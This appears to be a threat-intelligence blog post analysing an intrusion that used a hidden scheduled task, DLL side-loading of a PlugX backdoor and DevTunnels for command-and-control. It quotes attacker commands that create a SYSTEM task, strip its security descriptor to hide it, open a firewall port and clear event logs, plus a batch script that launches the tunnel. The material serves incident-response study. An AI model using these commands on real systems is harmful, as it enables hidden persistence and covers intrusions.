[ << ALL_FEED ]

Operation Tartaria — PlugX 🤝 DevTunnels

More in General

Operation Tartaria — PlugX 🤝 DevTunnels

At the end of May, PHDays Fest wrapped up, during which, on the Defense track, the 4RAYS team discussed the specifics of how the Windows Task Scheduler works.

The experience of the PT ESC IR team shows that persistence via hidden tasks is indeed a fairly rare method of masking a targeted attack, but we do periodically encounter it in our projects as well. While investigating an incident in early 2025, we discovered a hidden task in a dump (triage) on one of the nodes in a compromised infrastructure. To detect such tasks, PT-Dumper sets the keys IsHiddenTask (SD deleted — Security Descriptor) and IsMissingOnFS (XML missing from the file system).

{"TaskId":"[REDACTED]","TaskName":"7zup_Server","TaskRegistryPath":"\\7zup_Server","TaskAuthor":"[REDACTED]","IsHiddenTask":true,"IsMissingOnFS":true,"Action":{"Context":"Author","Properties":[{"Id":"","ActionName":"Execution","Arguments":"-remote up","Command":"C:\\PROGRA~1\\7-Zip\\7zUp.exe","WorkingDirectory":"","Flags":0}],"Version":3},"Triggers":[{"TriggerType":"Boot","Comment":"Boot"}],"CreatedTime":"2025-01-12T06:25:32Z","LastRunTime":"2025-06-18T18:17:23Z","LastErrorCode":"","Timeline":"2025-01-12T06:25:32Z"}
Code language: JSON / JSON with Comments (json)


The task launched 7zUp.exe, which turned out to be vulnerable to the DLL Side-Loading technique via the native debugger CDB.exe. On startup, the debugger loads a malicious library, dbgeng.dll, packed with the VMProtect packer with custom section names.

The encrypted payload of the updated PlugX is delivered in the shellcode payload manifest.txt, covered by a single-byte XOR. A similar version of PlugX was described in an article. It is interesting to note that in the payload the MZ and PE header bytes are overwritten, although the rest of the header structure is preserved.

On startup, PlugX writes its identifier to a registry key — HKLM\SOFTWARE\Clients\Mail\cf. This sample is divided into two logical modules: one executes commands, the other is a connector. This is implemented by injecting code into the wksprt.exe and explorer.exe processes. The modules communicate via the pipe \\.\PIPE\X<PID>. In the PlugX samples found, the connection to the C2 server (0.0.0.0:53, 0.0.0.0:5355) was established via TCP, which indicates a more lightweight version of this tool.

In addition to launching the passive PlugX, we discovered a task that launches the executable C:\Windows\System32\oobe\Setup.exe.

<Exec>
      <Command>C:\Windows\System32\oobe\Setup.exe</Command>
      <Arguments>/ui</Arguments>
    </Exec>
Code language: plaintext (plaintext)


It turned out that every time an error occurs when Setup.exe starts, the script C:\Windows\Setup\Scripts\ErrorHandler.cmd is launched. A similar technique is described in a blog. In our case, the attackers launched devNetwork.exe, which is the DevTunnels tunnel.

@echo off
taskkill /im devNetwork.exe /f
timeout /t 5 /nobreak >nul
C:\ProgramData\NetWorks\devNetwork.exe host [REDACTED]
timeout /t 2 /nobreak >nul
exit
Code language: YAML (yaml)


Thus, as the attackers moved laterally across the network, they infected systems with the passive backdoor PlugX, while communication with the C2 server occurred using the legitimate DevTunnels utility.

Fun fact: on startup, PlugX launches a keylogger, which is one of its plugins, and records keystrokes to the file C:\Users\[REDACTED]\AppData\Roaming\ntuser.dat.LOG1 and clipboard contents to the file C:\Users\[REDACTED]\AppData\Roaming\ntuser.dat.LOG2. By examining these logs, we discovered a number of commands that the attackers executed during the course of the attack and lateral movement across the infrastructure:

schtasks /create /RL HIGHEST /F /tn "7zup_Server" /tr "C:\PROGRA~1\7-Zip\7zUp.exe -remote up" /sc onstart /RU SYSTEM
schtasks /run /tn 7zup_Server
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\7zup_Server" /v SD /f
del %SystemRoot%\System32\Tasks\7zup_Server /f 
...
Code language: plaintext (plaintext)


whoami /groups
netsh advfirewall firewall add rule name="WinDeviceSync" protocol=TCP dir=in localport=5355 action=allow
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" /q:true /ow:true /backup:false 
nslookup autodiscover.<yourdomain>.com
...
Code language: Intel x86 Assembly (x86asm)


Stay tuned!

#dfir #ti #apt #reverse #malware
@ptescalator

More from oUth0R

More from oUth0R

More in General